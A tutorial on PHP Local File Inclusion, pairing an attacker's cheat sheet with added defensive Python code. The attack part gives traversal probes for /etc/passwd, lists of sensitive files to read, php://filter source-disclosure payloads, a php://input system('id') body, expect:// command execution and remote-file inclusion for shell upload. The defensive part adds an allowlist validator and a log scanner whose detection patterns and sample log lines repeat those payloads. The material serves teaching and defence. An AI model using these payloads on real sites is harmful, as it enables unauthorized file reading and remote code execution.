I. What is Local File Inclusion
Local File Inclusion (LFI) is a vulnerability that gives an attacker unauthorized access to files on the server. It exists when a web application includes a file based on user input without correctly sanitizing that input, allowing an attacker to inject path traversal characters and include other files from the web server. LFI lets the attacker read sensitive files on the server, and it may also lead to obtaining a shell.
Vulnerable code in PHP:
The vulnerability arises when a PHP script passes user input to functions such as “include”, “include_once”, “require” or “require_once”.

```php
// Variant 1: the request parameter is passed to require() as-is
$file = $_GET['page'];
require($file);
```

```php
// Variant 2: an extension is appended, so only files ending in .php are included
$file = $_GET['page'];
require($file . ".php");
```
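The two snippets above trust the request parameter completely. The following is an added example, not code from the original post, written in Python rather than PHP so the checks can be run on their own: it models the decision a hardened page handler should make before including anything, using the inputs shown later in this post as probes. The allowlist, the "pages" directory and the helper names are assumptions made for the example.

```python
# Added example, not from the original post: the post's two PHP snippets pass
# $_GET['page'] straight into require(). This module shows the decision a
# hardened handler should make before including anything. The page names,
# directory and helper names are hypothetical.
import os
import re

# Hypothetical allowlist: the only pages the application actually ships.
ALLOWED_PAGES = {"home", "about", "contact"}

# A page name is a plain token: no '/', '.', ':' or NUL can get through,
# which rules out traversal and every stream wrapper up front.
PAGE_NAME = re.compile(r"^[a-z0-9_]+$")


def resolve_page(base_dir, page):
    """Return the absolute path of the page to include, or raise ValueError.

    Each check blocks one kind of input shown in the post:
      - NUL bytes, which must never reach a filesystem call
      - stream wrappers such as php://filter, expect://, zip://, http://
      - path traversal such as ../../../../etc/passwd
      - names outside the allowlist, so only shipped pages can load
      - realpath containment as a last line against symlink escapes
    """
    if not isinstance(page, str) or "\x00" in page:
        raise ValueError("invalid page parameter")
    if "://" in page:
        raise ValueError("stream wrappers are not allowed")
    if not PAGE_NAME.fullmatch(page):
        raise ValueError("page name contains disallowed characters")
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the pages directory")
    return candidate


def rejects(base_dir, page):
    """True when resolve_page refuses the input; convenience for demos and tests."""
    try:
        resolve_page(base_dir, page)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Probe values taken from the post, plus one legitimate page name.
    probes = [
        "about",
        "../../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=index",
        "pHp://FilTer/convert.base64-encode/resource=index.php",
        "expect://command",
        "about\x00",
    ]
    for probe in probes:
        if rejects("pages", probe):
            print(repr(probe), "-> REJECTED")
        else:
            print(repr(probe), "->", resolve_page("pages", probe))
```

In the PHP handler the same control is a fixed lookup: test the parameter with `in_array($page, $allowed, true)` and require the known path for that name, instead of concatenating the request value. Setting `allow_url_include=Off` (the default) additionally stops include/require from loading php://input, data:// or remote URLs, but it does not block php://filter, which is a local wrapper; that is why the parameter check itself is needed.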
II. Identifying LFI Vulnerabilities within Web Applications
http://example.com/?page=filename[.extension]
http://example.com/?view=filename[.extension]
http://example.com/?file=filename[.extension]
More parameters that commonly take a file name:
?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload}
?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload}
?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload}
+ Sometimes the web application gives itself away by displaying an error message.
+ How to test: try to retrieve the /etc/passwd file (in some cases this technique is similar to Path Traversal).
http://example.com/?page=../../../../etc/passwd
If it succeeds, we get the full content of the passwd file. Files commonly targeted:
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
/etc/mtab
/etc/inetd.conf
/var/log/dmessage
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
PROC files
/proc/sched_debug # Can be used to see what processes the machine is running
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
2. Bypassing PHP execution
When you access a file through LFI, you can easily read a .txt file. But with a .php file you can't read the content by the normal method, because of PHP execution: the web server executes the file, since its extension says it contains code, so you get the script's output instead of its source. This can be bypassed by using a built-in PHP filter:
php://filter/convert.base64-encode/resource=index
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
3. Test for RFI
Remote File Inclusion (RFI) occurs when an application receives a path to a file as input for a web page and does not properly sanitize it. This allows an external URL to be supplied to the include function:
?page=<url>
If the LFI site loads the content of the URL we provide, it is definitely vulnerable to RFI. We can easily upload our shell to the server through this input.
4. LFI to RCE
+ What is RCE: RCE stands for Remote Code Execution (also known as Arbitrary Code Execution).
Remote Code Evaluation is a vulnerability that can be exploited if user input is injected into a file or a string and then executed (evaluated) by the programming language's parser. Usually this behaviour is not intended by the developer of the web application. A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and of the web server. It is important to note that almost every programming language has code evaluation functions.
There are many scenarios in which LFI leads to RCE; let's review them!
# LFI → RCE via PHP wrappers
+ PHP wrapper expect://command
All about the PHP expect wrapper:
https://www.php.net/manual/en/wrappers.expect.php
PHP's expect:// wrapper allows execution of system commands, but the expect PHP module is not enabled by default; the extension has to be installed.
+ PHP wrapper php://input
Then we can send a POST request. Example:
POST DATA: <?php system('id'); ?>
+ PHP wrapper zip://
I have a post about this using a Rootme challenge as an example.
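Every technique in sections 2, 3 and 4 leaves a distinctive value in the include parameter, which makes it straightforward to spot in web-server logs. The following is an added example, not code from the original post: a small scanner that reads access-log lines, decodes each query parameter, and tags traversal sequences, php:// and expect:// style wrappers, remote URLs and the sensitive file names listed above. The log lines are constructed for this example; the parameter names are a subset of the post's list of commonly vulnerable parameters, and the tag and severity names are assumptions.

```python
# Added example, not part of the original post: scan access-log lines for the
# LFI/RFI indicators the post describes (traversal to /etc/passwd, php:// and
# expect:// wrappers, remote URLs in include parameters). The log lines are
# constructed for this example; the parameter names are a subset of the
# post's list of commonly vulnerable parameters.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the post lists as common inclusion points (subset).
INCLUSION_PARAMS = {
    "page", "file", "view", "include", "inc", "path", "dir", "doc",
    "mod", "layout", "content", "conf", "download",
}

# Patterns checked against the fully URL-decoded parameter value.
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
WRAPPER = re.compile(r"^(php|expect|zip|phar|data)://", re.IGNORECASE)
REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SENSITIVE = re.compile(r"/etc/(passwd|shadow|group)\b|/proc/self/environ", re.IGNORECASE)

# Combined-format request line: client, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic (documentation IP ranges, not real hosts).
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=%252e%252e%252fetc%252fshadow HTTP/1.1" 403 221',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php HTTP/1.1" 200 9120',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 77',
    '198.51.100.9 - - [10/Oct/2023:13:57:11 +0000] "GET /index.php?page=http://203.0.113.77/remote.txt HTTP/1.1" 200 77',
    '198.51.100.9 - - [10/Oct/2023:13:58:00 +0000] "GET /search.php?q=../../etc/passwd HTTP/1.1" 200 300',
]


def decode_fully(value):
    """Undo up to two extra layers of percent-encoding (%252e%252e%252f -> ../)."""
    return unquote(unquote(value))


def classify(value):
    """Return the indicator tags that apply to one decoded parameter value."""
    v = decode_fully(value)
    tags = []
    if TRAVERSAL.search(v):
        tags.append("traversal")
    if WRAPPER.match(v):
        tags.append("php-wrapper")
    if REMOTE.match(v):
        tags.append("remote-include")
    if SENSITIVE.search(v):
        tags.append("sensitive-file")
    return tags


def scan_log(lines):
    """Return one finding per suspicious parameter, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            tags = classify(value)
            if not tags:
                continue
            findings.append({
                "ip": m.group("ip"),
                "param": name,
                "value": value,
                "tags": tags,
                "status": int(m.group("status")),
                # A hit on a known inclusion parameter is the stronger signal.
                "severity": "high" if name.lower() in INCLUSION_PARAMS else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f["severity"].upper(), f["ip"], f["param"], f["tags"], f["status"], f["value"])
```

Matching happens on the decoded value, so double-encoded traversal and mixed-case wrapper names (the pHp://FilTer form shown in section 2) are caught alongside the plain forms. Blocked requests (status 403) are still reported, since a refused probe is evidence that the parameter is being tested.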